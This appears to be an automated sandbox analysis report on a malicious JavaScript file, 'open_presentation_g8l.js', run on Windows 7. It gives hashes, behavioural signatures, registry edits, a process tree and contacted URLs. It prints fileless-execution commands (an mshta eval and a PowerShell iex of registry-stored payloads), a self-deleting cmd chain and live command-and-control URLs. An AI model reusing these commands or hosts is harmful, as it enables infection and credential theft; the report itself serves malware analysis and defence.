Analysis
-
max time kernel
122s -
max time network
78s -
platform
windows7_x64 -
resource
win7v200410 -
submitted
17-04-2020 15:20
Static task
static1
Behavioral task
behavioral1
Sample
open_presentation_g8l.js
Resource
win7v200410
windows7_x64
0 signatures
0 seconds
General
-
Target
open_presentation_g8l.js
-
Size
1.4MB
-
MD5
58da4d0d9bdde0fcecd9d244ced71cc5
-
SHA1
15122a24648096af45215fa4bfa55f36a432088b
-
SHA256
e8d7ff11016b3a8f8b3c3e07b3895ff9e9d286aaf45bcc41907b701d7af1bd85
-
SHA512
346233e19159d7228d1905b645d4b7d6682230f3cccdce04284f1433d2d935c57c6d332364b65334edc374de0aab2c7451dde1448e7c59fc026a0e0b0567230f
Malware Config
Signatures
-
Loads dropped DLL 1 IoCs
Processes:
regsvr32.exepid process 1332 regsvr32.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
iexplore.exeIEXPLORE.EXEIEXPLORE.EXEpid process 1012 iexplore.exe 1012 iexplore.exe 1720 IEXPLORE.EXE 1720 IEXPLORE.EXE 1012 iexplore.exe 1012 iexplore.exe 1060 IEXPLORE.EXE 1060 IEXPLORE.EXE 1012 iexplore.exe 1012 iexplore.exe 1720 IEXPLORE.EXE 1720 IEXPLORE.EXE -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
iexplore.exeExplorer.EXEpid process 1012 iexplore.exe 1012 iexplore.exe 1012 iexplore.exe 1324 Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exeExplorer.EXEpid process 2044 powershell.exe 2044 powershell.exe 1324 Explorer.EXE -
Suspicious behavior: MapViewOfSection 4 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exepid process 2044 powershell.exe 1324 Explorer.EXE 1324 Explorer.EXE 1816 cmd.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of WriteProcessMemory 60 IoCs
Processes:
wscript.exeregsvr32.exeiexplore.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exedescription pid process target process PID 2040 wrote to memory of 1316 2040 wscript.exe regsvr32.exe PID 2040 wrote to memory of 1316 2040 wscript.exe regsvr32.exe PID 2040 wrote to memory of 1316 2040 wscript.exe regsvr32.exe PID 2040 wrote to memory of 1316 2040 wscript.exe regsvr32.exe PID 2040 wrote to memory of 1316 2040 wscript.exe regsvr32.exe PID 1316 wrote to memory of 1332 1316 regsvr32.exe regsvr32.exe PID 1316 wrote to memory of 1332 1316 regsvr32.exe regsvr32.exe PID 1316 wrote to memory of 1332 1316 regsvr32.exe regsvr32.exe PID 1316 wrote to memory of 1332 1316 regsvr32.exe regsvr32.exe PID 1316 wrote to memory of 1332 1316 regsvr32.exe regsvr32.exe PID 1316 wrote to memory of 1332 1316 regsvr32.exe regsvr32.exe PID 1316 wrote to memory of 1332 1316 regsvr32.exe regsvr32.exe PID 1012 wrote to memory of 1720 1012 iexplore.exe IEXPLORE.EXE PID 1012 wrote to memory of 1720 1012 iexplore.exe IEXPLORE.EXE PID 1012 wrote to memory of 1720 1012 iexplore.exe IEXPLORE.EXE PID 1012 wrote to memory of 1720 1012 iexplore.exe IEXPLORE.EXE PID 1012 wrote to memory of 1060 1012 iexplore.exe IEXPLORE.EXE PID 1012 wrote to memory of 1060 1012 iexplore.exe IEXPLORE.EXE PID 1012 wrote to memory of 1060 1012 iexplore.exe IEXPLORE.EXE PID 1012 wrote to memory of 1060 1012 iexplore.exe IEXPLORE.EXE PID 1028 wrote to memory of 2044 1028 mshta.exe powershell.exe PID 1028 wrote to memory of 2044 1028 mshta.exe powershell.exe PID 1028 wrote to memory of 2044 1028 mshta.exe powershell.exe PID 2044 wrote to memory of 772 2044 powershell.exe csc.exe PID 2044 wrote to memory of 772 2044 powershell.exe csc.exe PID 2044 wrote to memory of 772 2044 powershell.exe csc.exe PID 772 wrote to memory of 1228 772 csc.exe cvtres.exe PID 772 wrote to memory of 1228 772 csc.exe cvtres.exe PID 772 wrote to memory of 1228 772 csc.exe cvtres.exe PID 2044 wrote to memory of 1360 2044 powershell.exe csc.exe PID 2044 wrote to memory of 1360 2044 powershell.exe csc.exe PID 2044 wrote to memory of 1360 2044 powershell.exe csc.exe PID 1360 wrote to memory of 1532 1360 csc.exe cvtres.exe PID 1360 wrote to memory of 1532 1360 csc.exe cvtres.exe PID 1360 wrote to memory of 1532 1360 csc.exe cvtres.exe PID 2044 wrote to memory of 1324 2044 powershell.exe Explorer.EXE PID 2044 wrote to memory of 1324 2044 powershell.exe Explorer.EXE PID 2044 wrote to memory of 1324 2044 powershell.exe Explorer.EXE PID 1324 wrote to memory of 1012 1324 Explorer.EXE iexplore.exe PID 1324 wrote to memory of 1012 1324 Explorer.EXE iexplore.exe PID 1324 wrote to memory of 1012 1324 Explorer.EXE iexplore.exe PID 1324 wrote to memory of 1816 1324 Explorer.EXE cmd.exe PID 1324 wrote to memory of 1816 1324 Explorer.EXE cmd.exe PID 1324 wrote to memory of 1816 1324 Explorer.EXE cmd.exe PID 1324 wrote to memory of 1816 1324 Explorer.EXE cmd.exe PID 1324 wrote to memory of 1816 1324 Explorer.EXE cmd.exe PID 1324 wrote to memory of 1816 1324 Explorer.EXE cmd.exe PID 1816 wrote to memory of 1748 1816 cmd.exe PING.EXE PID 1324 wrote to memory of 2004 1324 Explorer.EXE cmd.exe PID 1324 wrote to memory of 2004 1324 Explorer.EXE cmd.exe PID 1324 wrote to memory of 2004 1324 Explorer.EXE cmd.exe PID 1324 wrote to memory of 2028 1324 Explorer.EXE cmd.exe PID 1324 wrote to memory of 2028 1324 Explorer.EXE cmd.exe PID 1324 wrote to memory of 2028 1324 Explorer.EXE cmd.exe PID 1324 wrote to memory of 1196 1324 Explorer.EXE cmd.exe PID 1324 wrote to memory of 1196 1324 Explorer.EXE cmd.exe PID 1324 wrote to memory of 1196 1324 Explorer.EXE cmd.exe PID 1324 wrote to memory of 1052 1324 Explorer.EXE cmd.exe PID 1324 wrote to memory of 1052 1324 Explorer.EXE cmd.exe PID 1324 wrote to memory of 1052 1324 Explorer.EXE cmd.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2044 powershell.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Processes:
IEXPLORE.EXEExplorer.EXEiexplore.exeIEXPLORE.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA IEXPLORE.EXE Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Explorer.EXE Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iexplore.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA IEXPLORE.EXE -
Suspicious use of SetThreadContext 4 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exedescription pid process target process PID 2044 set thread context of 1324 2044 powershell.exe Explorer.EXE PID 1324 set thread context of 1012 1324 Explorer.EXE iexplore.exe PID 1324 set thread context of 1816 1324 Explorer.EXE cmd.exe PID 1816 set thread context of 1748 1816 cmd.exe PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
PING.EXEpid process 1748 PING.EXE -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
iexplore.exeIEXPLORE.EXEIEXPLORE.EXEmshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 70786ba6dc14d601 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "293909061" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000dcc209169d6de14b878908571718e558000000000200000000001066000000010000200000001cd6bdf78fca08c2e2a2b53689d716a9c1241ecda98f5d12ee56a03f85f83cd6000000000e80000000020000200000002eb920705d3433ad57022f0aeda361c1543d65a09a3c8cadff5ec6847d37167b20000000d4e154468d672df7dc5f12876ecf6c7bd31374431bb6955c88c678e32a2f4aa3400000005125916f12e2c8519ef162e8f6d584cce75374c60e24ae4c36a74330f5964269a4fc15310282276bb13df9bb379ccf8e6b56a33c06e542d16386f8376b359120 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000dcc209169d6de14b878908571718e558000000000200000000001066000000010000200000002e980421967c0de55aabe00a2fbf7e58b57b72b2dfb5e2eaf16d52b6e1e32cb8000000000e8000000002000020000000619e8b829ddd6dfd9d75e7f53b907b086bacf50aaf7403d9b3d27920806c38e8900000004685f15c3983c29f104ae8c05aa8690e08d73ff8e3f997e73acf0230c9c21bd18b00ef4b4d4380b8f8c38f9a9293856b5bc47474eb22a348ac9ca187cdd0280a111c5f655078db450d98d8650a81a96cd28d652a564986c4ddda019946e6b6272f5cab18c0060f2a7dd0ad67b18b63d253db916ec51f521fbe46528a6fd33abe99d4948d857dbd88c4cebcabeb0555bc4000000058ac23fe43760b73736ef9fe520250348ab0d6a0641bfccb28fbb9fbeb39e8d66a394befdc577e4fd5a61a5a87acaac154e89008447adb2b4a0bf81f251c54cb iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{DD6D4971-80CF-11EA-98B8-E6B9E4928476} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe -
Makes http(s) request 13 IoCs
Contacts server via http/https, possibly for C2 communication.
Processes:
description flow ioc HTTP URL 7 http://f1.pipen.at/api1/Z0awAgT68L8SB/vwuDoICM/YkLAoRRgZMMD1FbB_2FhWt_/2FLZRDd8PV/B_2FKgEXZArACCIdG/uX_2FcC8H_2F/BGP40qWrtgH/dQZZm_2Fue2aCS/PHoqFfAlqRfNJrsEl1HC2/42twPr7NMCYxJozB/Q1F_2F2FWkMluiB/vpk7eHtAq0MlnwBe62/mxH4O3D2C/oK4MRx_2BZFAE77kfeMc/YTkDF7F4QoSeK3wBm2R/P4XLV1E2ZGkG_2B_2BjgWQ/jh9nLAe3OQqre/EbQcPXZG/HfU_0A_0D_2Bi6KqmG1obsx/f_2BRfO02I/Njy_2Fv1geqFeCQQD/YAWsht8Y/zHXg HTTP URL 12 http://api10.dianer.at/jvassets/xI/t64.dat HTTP URL 21 http://vv.malorun.at/api1/qzmvh9OaP19A6idBAQmh/LyN7eA0Zx1UtJpcCxnb/ZaVCEAjs8zhyGB79hTsLmJ/h2SvjAuJU96Fy/VtNZWnQu/6XwhLxca8NVlQ4J_2FxcvaP/NmhLwvy5fu/bP4yNdg6nc6JIhUco/KxJpIl1I2GnI/g5JAGYwcLnl/mGOk5uSNRDW_2B/0jMjDZfTjoC48697erftE/v6cy9AYM7X8lsVdK/ZlRptmwkHhKIPga/jIKtpRTD3Jua7iBMq_/2F2c8WYx4/QDeewXI2TK_0A_0DOf9_/2B4sQKcIg2adJNJezEx/95hqDjEeOnvm3_2BjhZRuf/JFGbkd HTTP URL 23 http://vv.malorun.at/api1/YT2YCAs9ykqONBaOmtbCdmh/zan8NL9Pkn/_2BhAMSW429hN56y3/5726sP3Rq3zV/tQIl_2Fuxf_/2FSjyaLhajJtcF/jKOItJXGPQHIDEMDmO4qd/F85_2FskCXJGuEek/aRxMLG05KFmVIjN/c9n39ylbcgBj3XC4t6/rU5cHXmYI/J8OL4afAvgBSAgUvF2be/0eq0aHCeirjZ0bpdGFk/49uaa3d1FOdKnLtK44bJt2/l9_2BT7zGcCew/qH0vMOaC/HvnFUoyx0slZty_0A_0D9fy/F58JxNbMx0/dV_2Bb201tcddojmt/mdvx9mCtM/PdQHNeQrj/C HTTP URL 25 http://vv.malorun.at/api1/XoaAHVqo/6QAAbAdNpYHqTsVjAyLNEJD/JJMh2ZcGXM/y_2FiAUEafdTTKVql/w5EJddtLBIt3/ZXkonLkpE_2/FYIkIQrMovJPHf/dyNMS2WSTZ6VhtAFq9_2B/12HcdEMdgW9KamhM/FMC4S76b8mpytYx/aILT6WC6HzJIPtQdVD/UGnRkJzRF/w48HfVWYsofiPG7_2BG5/_2BkX_2Fb7GYvp7peSm/klq54fnh2qn0dWvuPFtzxV/KcwPSPU4Ns4ai/BOywhD6A/tHdHrKOa_0A_0D5jWO3kRRV/0_2F_2FGdv/JkeF7alKqPelsNKBe/uaQc6Z86xeUgF/3A HTTP URL 35 http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D HTTP URL 5 http://f1.pipen.at/api1/7CaMLX8BAG/dYO0A6NNuYgJ7Htgm/e2DCHq9GmfHs/6sKQsYz_2BU/Q_2FxOGxRWQPqI/lrkSL8jnJU5UM4Ad6Ufhb/2GnGL8z4e64xu2qH/0T8JQ_2F1hXj7mK/4C6foaqu_2FpyB2abu/w25pxdHhg/nip72cVI94aLvwF5_2FY/LwoXHpWpq5OuIu5YUIn/0_2Bs0THoCm7wgtFxPL1Wy/RmQetRSueKcBJ/_2Be7D5_/2F59zpYFCeuWpkGszXVoY5E/SiV2yRZSG8/hKKxZSUj8y_0A_0Dt/7vXyME7U6HNx/p6MEARXMpzb/xOCrI2_2BFhizi/JPh8pOW1/MVi HTTP URL 8 http://f1.pipen.at/favicon.ico HTTP URL 9 http://f1.pipen.at/api1/VBRhEsjfYru8ski7Io/LZv_2FIaU/b9p4edTTqNjlLAquGfTx/ZQan0QNgATfpBmyPztM/gLvrNterDAZgjppL7m1Bq_/2FPzfAfNSHS73/iUKdNVMV/YGskTpUMJDTfi7ZsLko3hrY/wKhdOVsbHP/GYfGhtUKlukPNmbVP/A_2F46Lfvp04/MlCWjFhnb7V/V4wWwBTgD3YAqh/iuLfFrFPI1OZ_2BAGrnO4/08bAXGecDkezHyVA/EtG_2BzsMVVKZtK/TzO3qVJTAExq1R_0A_/0DC3uu3Bt/WAjnX_2F33THj4No1H0G/fjdmk3p4qHVj4eiiU8C/G0iTcOLqfigilsuQbSGkF_/2Fxw HTTP URL 22 http://vv.malorun.at/api1/jURshWhXIT/l2iIc7vKjF0ljKHbT/3gaJ0PwuikLK/dV8sC_2BiaZ/oogQAtf1FsxR4o/wj2qABuKjdDuDa9kN_2B7/QKc9tlKBgNv5aXXa/s_2FEovKd9fM05_/2BHHt_2F3GfxAW93Ka/Tn5sbclpv/OcX_2B_2F3e2XJGqvMjZ/mVcGCbessmm72FIkexz/93VhgAeoA1Oeo3xKOyaXsA/MPNx1eW7ezdI8/feAszILv/SPXVH1Q_2B4JCKWTgW7kDCm/ZGwcbq2f85/ujd_2FU86cC6_0A_0/DQFrA5HpZTnb/9K60clc2Qj5/KMx29kCJgxY16w/CknmlmrIYF/b HTTP URL 24 http://vv.malorun.at/api1/d3UCV8OFR/sTGNkfb3Mo9AKEllm9SA/IlPgtEMFr2g9KVtnquA/SROGEfdRxRf_2FwFtBmSIC/ORZ3U_2BpsRs2/P_2BDqaR/d1Sr4bSIN_2F1dyudM206tm/zHbkLUZKQ7/QFbsFnsX2D70GjQxP/uflqgQ7r067B/hooUc418qN5/GdPtlUngV7GHGr/qMut_2BlTgJcz9UQ_2BSV/W8gpK6_2BsrpDRUd/li_2F5Bo1aN3GOd/_2FNSXNbPDXcLNq2r5/n5ny_2FEv/ifx65zwrr6rujG_2B_0A/_0Dn5eGEocqxVE093Vi/u0KZQPdBc83C7NX1EAvEIP/jnZFJHdN/x HTTP URL 34 http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D HTTP URL 6 http://f1.pipen.at/favicon.ico
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:1324 -
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\open_presentation_g8l.js2⤵
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\System32\regsvr32.exe"C:\Windows\System32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\\lymCsi.txt3⤵
- Suspicious use of WriteProcessMemory
PID:1316 -
C:\Windows\SysWOW64\regsvr32.exeC:\Users\Admin\AppData\Local\Temp\\lymCsi.txt4⤵
- Loads dropped DLL
PID:1332
-
-
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\4F9B8A74-6250-5914-E4F3-B69D58D74A21\\DmdlDump'));if(!window.flag)close()</script>"2⤵
- Suspicious use of WriteProcessMemory
- Modifies Internet Explorer settings
PID:1028 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\4F9B8A74-6250-5914-E4F3-B69D58D74A21").Certxva2))3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetThreadContext
PID:2044 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nju1y22x\nju1y22x.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:772 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA69A.tmp" "c:\Users\Admin\AppData\Local\Temp\nju1y22x\CSC135A6FE8DD6543B3827E1DD57FDF9BE.TMP"5⤵PID:1228
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qzs455qe\qzs455qe.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1360 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA746.tmp" "c:\Users\Admin\AppData\Local\Temp\qzs455qe\CSC76D00C613B3B46ABB5D8379B1348AD3B.TMP"5⤵PID:1532
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\lymCsi.txt"2⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
- Suspicious use of SetThreadContext
PID:1816 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1748
-
-
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\EE70.bi1"2⤵PID:2004
-
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵PID:1116
-
-
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\EC18.bi1"2⤵PID:2028
-
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵PID:1100
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\EE70.bi1"2⤵PID:1196
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\EC18.bi1"2⤵PID:1052
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
PID:1012 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1012 CREDAT:275457 /prefetch:22⤵
- Suspicious use of SetWindowsHookEx
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
PID:1720
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1012 CREDAT:209928 /prefetch:22⤵
- Suspicious use of SetWindowsHookEx
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
PID:1060
-